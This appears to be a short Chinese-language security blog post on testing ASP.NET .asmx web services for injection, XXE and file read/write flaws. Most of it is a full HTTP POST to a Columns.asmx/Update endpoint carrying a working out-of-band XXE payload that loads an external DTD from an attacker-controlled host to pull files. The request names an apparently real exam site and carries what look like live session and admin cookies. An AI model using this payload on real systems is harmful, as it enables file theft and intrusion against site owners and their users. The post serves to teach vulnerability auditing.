背景是微信群里有伙伴问起asmx接口怎么测试,其实和其他语言的API接口一样,每一条接口都有可能存在SQL注入、XXE、文件读取写入等风险,代码审计时需关注扩展名为 .asmx的文件。在审计XXE漏洞时需看loadxml方法,如下图
HTTP请求Post 需要把xxe.xml地址更换成你的主机地址 ,请求成功之后就会返回一个 xxe.txt
POST http://xxx.com/Manage/SOAP/Columns.asmx/Update HTTP/1.1
Host: xxx.com
Connection: keep-alive
Content-Length: 8
Cache-Control: max-age=0
Origin: http://exam.weisha100.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://exam.weisha100.cn/Manage/SOAP/Columns.asmx?op=Update
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=ibxaewhdmvyuatw2m0qig0sw; Course_139=139; Course_145=145; Course_125=125; studentvcode=8cff9bf6694dccfc3b6a613d05d51d16; registercode=059fdcd96baeb75112f09fa1dcc740cc; StuedentUID=9182952260bdd0754be375f8607238eb; stuid=946fc793fa38c1acd146742be11e1beb; admincode=ebf12cb74e96e67e63783d93c534ef27; user_pagerSize=15; employee_pagerSize=15; limitdomain_pagerSize=15; logslogin_pagerSize=15;
logswork_pagerSize=15; logindex=3d863b367aa379f71c7afc0c9cdca41d; testarchives_pagerSize=20; archives_pagerSize=20; queserror_pagerSize=15; online_pagerSize=15; Course_88=88; article_39=39; stOnlineNumx=7242
result=<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE root[
<!ENTITY % remote SYSTEM "http://www.xxxx.com/xxe.xml">
%remote;]>
<root/>